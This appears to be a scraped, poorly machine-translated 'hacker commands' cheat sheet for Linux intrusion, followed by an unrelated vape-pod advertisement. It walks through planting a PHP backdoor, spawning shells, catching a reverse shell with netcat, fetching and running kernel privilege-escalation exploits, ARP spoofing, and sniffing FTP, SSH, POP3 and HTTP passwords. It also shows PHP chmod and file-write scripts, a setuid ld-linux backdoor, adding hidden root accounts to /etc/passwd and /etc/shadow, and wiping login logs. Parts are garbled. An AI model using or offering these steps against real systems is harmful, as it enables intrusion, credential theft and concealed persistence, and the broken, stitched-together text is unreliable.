Summary of commonly used commands for hackers linux intrusion

Write a php sentence and go up the back door:

[jobcruit@wa64-054 rankup_log]$ echo -e "" >rankuplog_time.php

[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php

1. Linux thinks about cross-site first. The shell can’t browse the target station, enter ls -la / on the command line

2. Overflow escalation

# python –c'impotr pty;pty.spawn(“/bin/sh”);

To get an interactive Shell, the general system installs python by default

Enter id

bash-3.2$ id

uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)

bash-3.2$

Here uid=529(zeicom) is not root authority yet,

Enter uname -r

Returns: 2.6.18-164.11.1.el5PAE

Linux privilege escalation can be roughly divided into third-party software vulnerabilities, local trust features, and kernel overflow

Find the corresponding exp, the address here is very complete, you can download it here

http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://

Command input pwd, this command is to display the current directory,

Let's see if we can compile gcc -help

The current directory is the directory of the shell, I upload 2.c in the shell

Reverse shell to port 12345 of your own machine on the external network

Local monitoring on the external network server nc -lvvp 12345

Generally you can get an apache interactive shell, but sometimes it doesn’t work

At this moment

# python -c'impotr pty;pty.spawn("/bin/sh");'

cd /tmp to enter the tmp directory

mkdir Papers creates a directory of Papers. Papers are inconspicuous

cd Papers to enter the Papers directory

pwd view current directory

Then the command input

wget download exp

gcc -o 2 2.c //Compile 2.c into an executable file g++ keio.cc -o keio

chmod +x 2 //Give 2 has execution permission

./2 //Execute 2, overflow

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

To make sure arpsniffer.c needs to install pcap and libnet first.

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0

tar zxvf libpcap-0.8.1.tar.gz

cd libpcap-0.8.1

./configure

make

make install

Recompile arpsniffer.c

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

No error was reported this time, and the compilation was successful.

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

Let's start deceiving, because it is the server side, so we deceive the gateway: (the network environment is as follows, the mail server ip: 192.168.0.11 gateway: 192.168.0.1 local machine: 192.168.0.77)

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Use tcpdump to monitor in another login

tcpdump -i eth0 host 192.168.0.11

If data is found, store the monitored data in the file:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Stop after 10 minutes, use the sz command under SecureCRT to download pop.txt to the local, and then use Ethereal to analyze.

Now we can use linsniffer to monitor the username and password we want.

Modify linsniffer.c first: monitor the corresponding application password according to your needs. Mine is as follows:

if(ntohs(tcp->dest)==21) p=1; /* ftp */

if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/

if(ntohs(tcp->dest)==23) p=1; /* telnet */

if(ntohs(tcp->dest)==80) p=1; /* http */

if(ntohs(tcp->dest)==110) p=1; /* pop3 */

if(ntohs(tcp->dest)==513) p=1; /* rlogin */

if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c

In file included from /usr/include/linux/tcp.h:21,

from linsniffer.c:32:

/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!

Don't worry about the warning, just run the compiled linsniffer directly.

[root@bbs111 root]# ./linsniffer

The user name and password are automatically saved under tcp.log.

3. Utilize cross-site code

linux does not raise rights for cross-directory access code

Linux permissions are more loose, but some virtual machines still cannot be accessed across directories.

If you can't raise the rights, try the following code. If you are lucky, you might cross over.

code show as below:

$path = stripslashes($_GET['path']);

$ok = chmod ($path, 0777);

if ($ok == true)

echo CHMOD OK, Permission editable file or directory. Permission to write;

?>

Save the above code as tmdsb.PHP

Then visit http://?path=../../The directory to be crossed/index.php

Here index.PHP is the file whose permissions are to be modified.

Another exp collected:

Save the following code as exp.PHP

Code:

@$filename = stripslashes($_POST['filename']);

@$mess = stripslashes($_POST['mess']);

$fp = @fopen({$_POST['filename']},'a');

@fputs($fp,$mess

);

@fclose($fp);

?>

4.2.618 Final Linux Kernel

udev escalation

Changed the udev privilege escalation, which is applicable to the kernel range of 2.6.*.

Still upload the file to the directory where the server shell is located, execute the command ls, and find that the file is already lying there, and then grant the exp execute permission.

chmod +x pwnkernel.c

chmod +x wunderbar_emporium.sh

chmod +x exploit.c

Execute overflow afterwards. /w*

Successful overflow, root authority.

After that, a backdoor is left~ I don't mind adding a root user. . . (Useradd -u 0 -o "username")

Enter the commands one by one

cd /tmp

sh-3.1# ls /lib/ld-linux*

/lib/ld-linux.so.2

sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven

sh-3.1# ls -l .str1ven

-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven

sh-3.1# chmod +s .str1ven

sh-3.1# ls -l .str1ven

-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

Successfully establish a backdoor, exit root, execute ./.str1ven `which whoami`, and successfully obtain root permissions~~

cat /etc/passwd View linux users

cat /etc/shadow View user password requires root privileges

cat /etc/sysconfig/network-scripts/ifcfg-ethn N represents the network card number to view the ip information of the network card

ifconfig view local ip information

cat /etc/resolv.conf View DNS information

bash -i can be used in a rebound shell to visually display commands

bash prompt: When you enter as an ordinary user with limited rights, you will usually have a prompt similar to bash$. When you take

When root login, your prompt will become bash#.

System variables: try echo "$USER / $EUID" and the system should tell you what user it thinks you are.

echo 1>/proc/sys/net/ipv4/if_forward is it because you made a mistake, it should be echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward, the default is 0, that is, the kernel does not filter packets, change it to 1, let the kernel filter the packets!

netstat -an |grep LISTEN |grep :80 View port

service --status-all | grep running

service --status-all | grep http

View running services

lsb_release -a View system version

Restart the ssh service:

/usr/sbin/sshd stop/

usr/sbin/sshd start

ssd_config file

PasswordAuthentication no,

Change it to

PasswordAuthentication yes

Only remote ssh can log in

Otherwise it displays Access denied

Among them, Usepam yes may be used to establish pam login, such as ssh from other linux host to the server. If it is closed, it cannot be opened.

Novice usage of su

First chomod 777 /etc/passwd

Then modify the gid and uid of the bin user to 0

Then passwd sets the password of the bin

Then cp /bin/bash /sbin/nologin

Then when su is su-bin can go to the root shell.

This principle is that when ssh does not allow root to log in with the ssh terminal, we do not know the root password, a very novice approach.

Okay like this

sed -is/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

Clear the last record cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero of=yourfile bs=10M count=10 Create a 100m large file using Linux Kernel

/etc/init.d/ssh start open port 22

/etc/ssh/sshd_config SSH service configuration file

ZGAR AZ Vape Pods 5.0S

ZGAR AZ Vape Pods 5.0S

ZGAR electronic cigarette uses high-tech R&D, food grade disposable pod device and high-quality raw material. All package designs are Original IP. Our designer team is from Hong Kong. We have very high requirements for product quality, flavors taste and packaging design. The E-liquid is imported, materials are food grade, and assembly plant is medical-grade dust-free workshops.

From production to packaging, the whole system of tracking, efficient and orderly process, achieving daily efficient output. WEIKA pays attention to the details of each process control. The first class dust-free production workshop has passed the GMP food and drug production standard certification, ensuring quality and safety. We choose the products with a traceability system, which can not only effectively track and trace all kinds of data, but also ensure good product quality.



We offer best price, high quality Pods, Pods Touch Screen, Empty Pod System, Pod Vape, Disposable Pod device, E-cigar, Vape Pods to all over the world.

Much Better Vaping Experience!




Pods, Vape Pods, Empty Pod System Vape,Disposable Pod Vape Systems

ZGAR INTERNATIONAL(HK)CO., LIMITED , https://www.szdisposable-vape.com

Posted on